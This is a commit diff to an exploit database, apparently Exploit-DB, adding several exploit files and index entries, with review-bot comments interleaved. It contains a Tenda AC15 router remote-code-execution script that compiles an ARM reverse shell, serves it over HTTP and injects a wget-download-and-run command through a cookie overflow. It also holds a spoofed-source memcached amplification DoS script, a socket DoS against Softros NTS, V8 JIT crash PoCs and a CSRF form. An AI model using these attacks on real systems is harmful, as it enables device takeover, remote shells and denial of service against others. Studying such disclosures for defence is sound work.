DB: 2018-03-07
8 changes to exploits/shellcodes Memcached - 'memcrashed' Denial of Service Softros Network Time System Server 2.3.4 - Denial of Service Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_ Chrome V8 JIT - 'GetSpecializationContext' Type Confusion Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read Tenda AC15 Router - Unauthenticated Remote Code Execution Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download Bravo Tejari Web Portal - Cross-Site Request Forgery
This commit is contained in:
parent
6a017b10c8
commit
9897272892
9 changed files with 757 additions and 2 deletions
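--- a/exploits/hardware/remote/44253.py
+++ b/exploits/hardware/remote/44253.py
@@ -0,0 +1,243 @@
+#!/usr/bin/env python
+# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
+import urllib2
+import struct
+import time
+import socket
+from optparse import *
+import SimpleHTTPServer
+import SocketServer
+import threading
+import sys
+import os
+import subprocess
+
+ARM_REV_SHELL = (
+"#include <sys/socket.h>\n"
+"#include <sys/types.h>\n"
+"#include <string.h>\n"
+"#include <stdio.h>\n"
+"#include <netinet/in.h>\n"
+"int main(int argc, char **argv)\n"
+"{\n"
+" struct sockaddr_in addr;\n"
+" socklen_t addrlen;\n"
+" int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
+
+" memset(&addr, 0x00, sizeof(addr));\n"
+
+" addr.sin_family = AF_INET;\n"
+" addr.sin_port = htons(%d);\n"
+" addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
+
+" int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n"
+
+" dup2(sock, 0);\n"
+" dup2(sock, 1);\n"
+" dup2(sock, 2);\n"
+
+" system(\"/bin/sh\");\n"
+"}\n"
+)
+
+REV_PORT = 31337
+HTTPD_PORT = 8888
+DONE = False
+
+"""
+* This function creates a listening socket on port
+* REV_PORT. When a connection is accepted it updates
+* the global DONE flag to indicate successful exploitation.
+* It then jumps into a loop whereby the user can send remote
+* commands to the device, interacting with a spawned /bin/sh
+* process.
+"""
+def threaded_listener():
+global DONE
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
+
+host = ("0.0.0.0", REV_PORT)
+
+try:
+s.bind(host)
+except:
+print "[+] Error binding to %d" %REV_PORT
+return -1
+
+
+print "[+] Connect back listener running on port %d" %REV_PORT
+
+s.listen(1)
+conn, host = s.accept()
+
+#We got a connection, lets make the exploit thread aware
+DONE = True
+
+print "[+] Got connect back from %s" %host[0]
+print "[+] Entering command loop, enter exit to quit"
+
+#Loop continuosly, simple reverse shell interface.
+while True:
+print "#",
+cmd = raw_input()
+if cmd == "exit":
+break
+if cmd == '':
+continue
+
+conn.send(cmd + "\n")
+
+print conn.recv(4096)
+
+"""
+* Take the ARM_REV_SHELL code and modify it with
+* the given ip and port to connect back to.
+* This function then compiles the code into an
+* ARM binary.
+@Param comp_path – This should be the path of the cross-compiler.
+@Param my_ip – The IP address of the system running this code.
+"""
+def compile_shell(comp_path, my_ip):
+global ARM_REV_SHELL
+outfile = open("a.c", "w")
+
+ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
+
+outfile.write(ARM_REV_SHELL)
+outfile.close()
+
+compile_cmd = [comp_path, "a.c","-o", "a"]
+
+s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
+
+while s.poll() == None:
+continue
+
+if s.returncode == 0:
+return True
+else:
+print "[x] Error compiling code, check compiler? Read the README?"
+return False
+
+"""
+* This function uses the SimpleHTTPServer module to create
+* a http server that will serve our malicious binary.
+* This function is called as a thread, as a daemon process.
+"""
+def start_http_server():
+Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
+
+print "[+] Http server started on port %d" %HTTPD_PORT
+httpd.serve_forever()
+
+
+"""
+* This function presents the actual vulnerability exploited.
+* The Cookie header has a password field that is vulnerable to
+* a sscanf buffer overflow, we make use of 2 ROP gadgets to
+* bypass DEP/NX, and can brute force ASLR due to a watchdog
+* process restarting any processes that crash.
+* This function will continually make malicious requests to the
+* devices web interface until the DONE flag is set to True.
+@Param host – the ip address of the target.
+@Param port – the port the webserver is running on.
+@Param my_ip – The ip address of the attacking system.
+"""
+def exploit(host, port, my_ip):
+global DONE
+url = "http://%s:%s/goform/exeCommand"%(host, port)
+i = 0
+
+command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT)
+
+#Guess the same libc base continuosly
+libc_base = ****
+curr_libc = libc_base + (0x7c << 12)
+
+system = struct.pack("<I", curr_libc + ****)
+
+#: pop {r3, r4, r7, pc}
+pop = struct.pack("<I", curr_libc + ****)
+#: mov r0, sp ; blx r3
+mv_r0_sp = struct.pack("<I", curr_libc + ****)
+
+password = "A"*offset
+password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
+
+print "[+] Beginning brute force."
+while not DONE:
+i += 1
+print "[+] Attempt %d" %i
+
+#build the request, with the malicious password field
+req = urllib2.Request(url)
+req.add_header("Cookie", "password=%s"%password)
+
+#The request will throw an exception when we crash the server,
+#we don't care about this, so don't handle it.
+try:
+resp = urllib2.urlopen(req)
+except:
+pass
+
+#Give the device some time to restart the
+time.sleep(1)
+
+print "[+] Exploit done"
+
+
+def main():
+parser = OptionParser()
+parser.add_option("-t", "–target", dest="host_ip", help="IP address of the target")
+parser.add_option("-p", "–port", dest="host_port", help="Port of the targets webserver")
+parser.add_option("-c", "–comp-path", dest="compiler_path", help="path to arm cross compiler")
+parser.add_option("-m", "–my-ip", dest="my_ip", help="your ip address")
+
+options, args = parser.parse_args()
+
+host_ip = options.host_ip
+host_port = options.host_port
+comp_path = options.compiler_path
+my_ip = options.my_ip
+
+if host_ip == None or host_port == None:
+parser.error("[x] A target ip address (-t) and port (-p) are required")
+
+if comp_path == None:
+parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")
+
+if my_ip == None:
+parser.error("[x] Please pass your ip address (-m)")
+
+
+if not compile_shell(comp_path, my_ip):
+print "[x] Exiting due to error in compiling shell"
+return -1
+
+httpd_thread = threading.Thread(target=start_http_server)
+httpd_thread.daemon = True
+httpd_thread.start()
+
+conn_listener = threading.Thread(target=threaded_listener)
+conn_listener.start()
+
+#Give the thread a little time to start up, and fail if that happens
+time.sleep(3)
+
+if not conn_listener.is_alive():
+print "[x] Exiting due to conn_listener error"
+return -1
+
+
+exploit(host_ip, host_port, my_ip)
+
+
+conn_listener.join()
+
+return 0
+
+
+
+if __name__ == '__main__':
+main()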
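Review bot: The long option strings in `main()` are written with an en dash — `"–target"`, `"–port"`, `"–comp-path"`, `"–my-ip"` — which optparse rejects as an invalid long option string, so `add_option` raises before any argument is parsed; if that is the committed text and not a rendering artifact, they should read `"--target"`, `"--port"`, `"--comp-path"` and `"--my-ip"`. Separately, `exploit()` builds `password` from a name `offset` that is defined nowhere in the file, and the `****` tokens on the `libc_base`, `system`, `pop` and `mv_r0_sp` lines are not valid Python, so the file as committed is a redacted PoC that cannot be imported or run. A header comment making that explicit, e.g. `# Redacted PoC: address constants and the overflow offset are intentionally omitted; not runnable as committed`, would stop readers from treating it as working code. `compile_shell()` also rebinds the global `ARM_REV_SHELL` to its formatted result, so a second call would apply `%` to a string that no longer contains format specifiers; formatting into a local variable avoids that.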
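--- a/exploits/linux/dos/44254.py
+++ b/exploits/linux/dos/44254.py
@@ -0,0 +1,90 @@
+# Written by Alex Conrey
+# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44254.zip
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see <http://www.gnu.org/licenses/>.
+#
+# This was created to better understand the memcrashed exploit
+# brought to light thanks to CloudFlare.
+# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
+#
+# Please sysadmin responsibly.
+
+import requests
+import memcache
+import re
+
+from scapy.all import *
+
+# Vulnerable memcached server list
+SERVER_LIST = [
+'172.17.0.2:11211',
+]
+
+# Destination
+TARGET = '1.2.3.4'
+
+# optional payload to set if no keys exist
+payload = requests.get('https://google.com').text
+payload_key = 'fuckit'
+
+# this forces payload to load into memory for being extra-evil and efficient
+if not payload:
+print 'Could not import payload, continuing anyway'
+
+try:
+for server in SERVER_LIST:
+if ':' in server:
+server = server.split(':')[0]
+
+ip = IP(src=TARGET, dst=server)
+packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
+
+# fetch known keys by id
+statitems_packet = packet_base.format('stats items')
+udp = UDP(sport=50000, dport=11211)/statitems_packet
+keyids = []
+resp = sr1(ip/udp)
+for key in str(resp.payload).split('\r\n'):
+# Skip first line which has hex in it (I'm lazy)
+if 'age' in key:
+key = key.split(':')[1]
+keyids.append(key)
+
+# fetch names for keys by id
+keys = []
+for kid in keyids:
+query = 'stats cachedump {0} 100'.format(kid)
+keyid_packet = packet_base.format(query)
+udp = UDP(sport=50000, dport=11211)/keyid_packet
+resp = str(sr1(ip/udp).payload).split('\r\n')
+for key in resp:
+if 'ITEM' in key:
+res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
+keys.append(res.group('keyname'))
+
+# if keys not present on target, make one
+if not keys:
+mc = memcache.Client([server],debug=False)
+mc.set(payload_key, payload)
+keys.append(payload_key)
+
+# iterate thru known keys and blast away
+for key in keys:
+query = 'get {0}'.format(key)
+fun_packet = packet_base.format(query)
+udp = UDP(sport=50000, dport=11211)/fun_packet
+sr1(ip/udp)
+
+except Exception:
+raise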
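Review bot: The outer `try:` / `except Exception: raise` around the whole server loop is a no-op — re-raising unchanged is exactly what an unhandled exception does — so it only costs an indentation level and can be dropped. `payload` is also fetched over the network at import time (`requests.get(...)` at module level), a side effect worth flagging with a comment such as `# NOTE: performs an HTTP request at import time`.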
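--- a/exploits/multiple/dos/44257.js
+++ b/exploits/multiple/dos/44257.js
@@ -0,0 +1,72 @@
+/*
+I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/#F0
+
+Here's a snippet.
+case IrOpcode::kStoreField: {
+FieldAccess access = FieldAccessOf(node->op());
+Node* value_node = node->InputAt(1);
+NodeInfo* input_info = GetInfo(value_node);
+MachineRepresentation field_representation =
+access.machine_type.representation();
+
+// Make sure we convert to Smi if possible. This should help write
+// barrier elimination.
+if (field_representation == MachineRepresentation::kTagged &&
+TypeOf(value_node)->Is(Type::SignedSmall())) {
+field_representation = MachineRepresentation::kTaggedSigned;
+}
+WriteBarrierKind write_barrier_kind = WriteBarrierKindFor(
+access.base_is_tagged, field_representation, access.offset,
+access.type, input_info->representation(), value_node);
+
+ProcessInput(node, 0, UseInfoForBasePointer(access));
+ProcessInput(node, 1,
+TruncatingUseInfoFromRepresentation(field_representation));
+ProcessRemainingInputs(node, 2);
+SetOutput(node, MachineRepresentation::kNone);
+if (lower()) {
+if (write_barrier_kind < access.write_barrier_kind) {
+access.write_barrier_kind = write_barrier_kind;
+NodeProperties::ChangeOp(
+node, jsgraph_->simplified()->StoreField(access));
+}
+}
+return;
+}
+
+Since Smi stores can be performed without write barriers, if it's possible to convert to Smi, it tries to help write barrier elimination by changing field_representation to MachineRepresentation::kTaggedSigned as noted in the comment. But whether or not field_representation has changed, it uses TruncatingUseInfoFromRepresentation to process the value node.
+
+But TruncatingUseInfoFromRepresentation(kTaggedSigned) returns UseInfo::AnyTagged() which is also compatible with kTaggedPointer. So even in the case where input_info->representation() is kTaggedPointer and the value is a heap object, it may eliminate the write barrier.
+
+Note: It's the same when handling kStoreElement.
+
+PoC 1 using kStoreField.
+*/
+
+var a, b; // should be var
+for (var i = 0; i < 100000; i++) {
+b = 1;
+a = i + -0; // -0 is a number, so this will make "a" a heap object.
+b = a;
+}
+
+print(a === b); // true
+gc();
+print(a === b); // false
+print(b);
+
+/*
+PoC 2 using kStoreElement.
+let arr = [{}];
+var v; // should be var
+for (var i = 0; i < 700000; i++) {
+arr[0] = 1;
+v = i + -0;
+arr[0] = v;
+}
+
+print(arr[0] === v) // true
+gc();
+print(arr[0] === v) // false
+print(arr[0]);
+*/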
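Review bot: `print` and `gc()` are not part of the language; they are d8 shell builtins, and `gc()` is only available when d8 is started with `--expose-gc`, which the file never states. A one-line comment above the first PoC, e.g. `// run under d8 with --expose-gc (print and gc are d8 builtins)`, would document the expected environment for anyone reproducing the report.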
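--- a/exploits/multiple/dos/44258.js
+++ b/exploits/multiple/dos/44258.js
@@ -0,0 +1,31 @@
+/*
+I think this commit has introduced the bug.
+https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
+
+According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
+
+The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
+if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
+return NoChange();
+}
+instance_map = Map::GetObjectCreateMap(prototype_const);
+
+PoC:
+*/
+
+var object;
+function opt() {
+opt['x'] = 1.1;
+try {
+Object.create(object);
+} catch (e) {
+}
+
+for (let i = 0; i < 1000000; i++) {
+
+}
+}
+
+opt();
+object = opt;
+opt();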
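--- a/exploits/multiple/dos/44259.js
+++ b/exploits/multiple/dos/44259.js
@@ -0,0 +1,47 @@
+PoC:
+function* opt(arg = () => arg) {
+let tmp = opt.x; // LdaNamedProperty
+for (;;) {
+arg;
+yield;
+
+function inner() {
+tmp;
+}
+
+break;
+}
+}
+
+for (let i = 0; i < 100000; i++) {
+opt();
+}
+
+/*
+PoC for release build:
+function* opt(arg = () => {
+arg;
+this;
+}, opt) {
+let tmp = arg.x;
+for (;;) {
+arg;
+yield;
+
+tmp = {
+inner() {
+tmp;
+}
+};
+}
+}
+
+for (let i = 0; i < 10000; i++) {
+opt();
+}
+
+What happened:
+1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
+2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
+3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
+*/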
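Review bot: The first line `PoC:` sits outside any comment, so the file does not begin with a heading but with a labelled statement in front of the generator declaration; I believe a label on a `function*` declaration is a SyntaxError, so as committed the file may not load at all — worth confirming in d8. Changing that line to `// PoC:` keeps the heading and leaves the second PoC, which already lives inside the block comment, unaffected.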
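--- a/exploits/multiple/dos/44260.js
+++ b/exploits/multiple/dos/44260.js
@@ -0,0 +1,57 @@
+/*
+In the current implementation, the bytecode generator also emits empty jump tables.
+https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89
+
+So the bytecode for the example code would be generated as follows:
+Code:
+function* opt() {
+for (;;)
+if (true) {
+
+} else {
+yield; // never reaches, never hits BindJumpTableEntry
+}
+}
+
+Bytecode:
+...
+0x35dda532a2a5 @ 75 : 90 04 01 01 SwitchOnSmiNoFeedback [4], [1], [1] { } <<--- SIZE: 1, but EMPTY
+...
+
+
+Here's a snippet of JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid which is used to enumerate a jump table.
+void JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid() {
+if (table_offset_ >= table_end_) return;
+
+current_ = accessor_->GetConstantAtIndex(table_offset_);
+Isolate* isolate = accessor_->bytecode_array()->GetIsolate();
+while (current_->IsTheHole(isolate)) {
+++table_offset_;
+++index_;
+current_ = accessor_->GetConstantAtIndex(table_offset_);
+}
+}
+
+If the jump table is empty, table_offset_ may exceed table_end_. As a result, out-of-bounds reads occur.
+
+PoC:
+*/
+
+function* opt() {
+for (;;)
+if (true) {
+
+} else {
+yield;
+}
+
+for (;;)
+if (true) {
+
+} else {
+yield; yield; yield; yield; yield; yield; yield; yield;
+}
+}
+
+for (let i = 0; i < 100000; i++)
+opt();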
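--- a/exploits/multiple/webapps/44256.html
+++ b/exploits/multiple/webapps/44256.html
@@ -0,0 +1,98 @@
+Exploit Title: Bravo Tejari Web Portal-CSRF
+CVE-ID: CVE-2018-7216
+Vulnerability Type: Cross Site Request Forgery (CSRF)
+Vendor of Product: Tejari
+Affected Product Code Base: Bravo Solution
+Affected Component: Web Interface Management.
+Attack Type: Local - Authenticated
+Impact: Unauthorised Access
+Category: WebApps
+Author: Arvind V.
+Author Social: @Find_Arvind
+
+Vulnerability Type: Cross Site Request Forgery (CSRF)
+Vendor of Product: Tejari
+Affected Product Code Base: Bravo Solution
+Affected Component: Web Interface Management.
+Attack Type: Local - Authenticated
+Impact: Unauthorised Access
+
+Product description:
+Bravo Tejari is a strategic procurement platform that enables organizations
+to generate more value, influence innovation and reduce risk powered by a
+unique supplier-centered approach that integrates supplier lifetime value
+throughout the entire procurement process
+
+Attack Scenario:
+The Web Interface of the Bravo Tejari procurement portal does not use
+random tokens to block any kind of forged requests. An atacker can take
+advantage of this scenario and create a forged request to edit user account
+details like name, address of the company/individual, email address etc. He
+then uses social engineering techniques to target specific individuals
+whose account details he would like to change. He simply sends the link and
+tricks the user into clicking the forged http request. The request is
+executed and user account details are changed without his knowledge.
+
+Proof of Concept Code:
+Forged HTTP Request used by the attacker:
+
+<html>
+<body>
+<form action="https://XXXX.XXXX.com/esop/toolkit/profile/regData.do"
+method="POST">
+<input type="hidden" name="userAct" value="confirmData" />
+<input type="hidden" name="from" value="registration_data" />
+<input type="hidden" name="actionNumber" value="0" />
+<input type="hidden" name="companyExtStatusCode" value="31" />
+<input type="hidden" name="companyExtStatusNote" value="" />
+<input type="hidden" name="hideCompany" value="false" />
+<input type="hidden" name="companyName"
+value="XYZ COMPUTER SYSTEMS FZ LLC" />
+<input type="hidden" name="companyAddress"
+value="Dubai internet city, DUBAI" />
+<input type="hidden" name="companyCity" value="DUBAI" />
+<input type="hidden" name="companyCountry" value="AE" />
+<input type="hidden" name="companyProvince" value="Dubai" />
+<input type="hidden" name="companyZip" value="25703" />
+<input type="hidden" name="companyPhone" value="43918600" />
+<input type="hidden" name="companyFax" value="" />
+<input type="hidden" name="companyEmail"
+value="XYZ.v@XYZ.com" />
+<input type="hidden" name="companyWebSite" value="" />
+<input type="hidden" name="companyLegalStructure" value="" />
+<input type="hidden" name="companyAddress2" value="" />
+<input type="hidden" name="companyFiscalCode" value="215703" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+Impact:
+The affected product is a procurement portal and so all communication
+regarding the contract lifecycle process is sent to user details provided
+on the portal. If this vulnerability is sucessfully exploited, the attacker
+will be able to change these details which will potentially affect the
+victim's business.
+
+Recommendation:
+Ensure that all sensitive CRUD Operations are appropriately protected with
+random tokens. Alternatively, the sensitive operations should also have an
+authentication layer to confirm user verification.
+
+References:
+http://seclists.org/fulldisclosure/2018/Feb/44
+https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html
+
+https://www.securityfocus.com/archive/1/541782/30/0/threaded
+
+Credit: Arvind Vishwakarma
+http://ultimateone1.blogspot.ae/
+
+
+
+Vulnerability Timeline:
+12th December 2017 – Vulnerability Discovered
+23rd December 2017 – Contacted Vendor – No Response
+7th January 2018 – Contacted Vendor again – No Response
+15th February 2018 – Vulnerability Disclosed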
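--- a/exploits/windows/dos/44255.txt
+++ b/exploits/windows/dos/44255.txt
@@ -0,0 +1,109 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
+[+] ISR: Apparition Security
+
+
+Vendor:
+=============
+www.softros.com
+https://nts.softros.com/downloads/
+
+
+Product:
+===========
+Network Time System Server v2.3.4
+Both x86/x64 versions
+
+
+Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
+virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
+maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
+routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
+establishing an interconnected time synchronization system for each and every machine and device on the company network.
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2018-7658
+
+
+Security Issue:
+================
+Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
+Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization
+could then potentially be impacted.
+
+
+Stack dump:
+
+'''
+eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
+eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
+NTSServerSvc+0x69a5:
+004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=??
+Resetting default scope
+
+FAULTING_IP:
+NTSServerSvc+69a5
+004069a5 880a mov byte ptr [edx],cl
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
+ExceptionCode: c0000005 (Access violation)
+
+'''
+
+
+Exploit/POC:
+=============
+import socket
+#Network Time System (Server) NTSServerSvc.exe v2.3.4
+#Softros Systems
+#NTS Server service for time synchronization over network
+
+print 'Network Time Server 11 byte Denial Of Service'
+print 'by hyp3rlinx'
+HOST=raw_input('Network Time Server IP')
+PORT=7001
+payload='A'*11
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((HOST,PORT))
+s.send(payload)
+s.close()
+
+
+
+Network Access:
+===============
+Remote
+
+
+Severity:
+=========
+Medium
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: February 10, 2018
+Second attempt : February 24, 2018
+Request CVE, assigned by Mitre : March 3, 2018
+March 5, 2018: Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).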
|
@ -5890,6 +5890,12 @@ id,file,description,date,author,type,platform,port
|
|||
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
|
||||
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
|
||||
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
|
||||
44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
|
||||
44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
|
||||
44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
|
||||
44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
|
||||
44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
|
||||
44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -16299,6 +16305,7 @@ id,file,description,date,author,type,platform,port
|
|||
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
|
||||
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
|
||||
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
|
||||
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -38564,7 +38571,7 @@ id,file,description,date,author,type,platform,port
|
|||
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
|
||||
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
|
||||
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
|
||||
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
|
||||
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
|
||||
|
@ -38961,4 +38968,5 @@ id,file,description,date,author,type,platform,port
|
|||
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
|
||||
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
|
||||
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
|
||||
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
|
||||
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
|
||||
44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
|
||||
|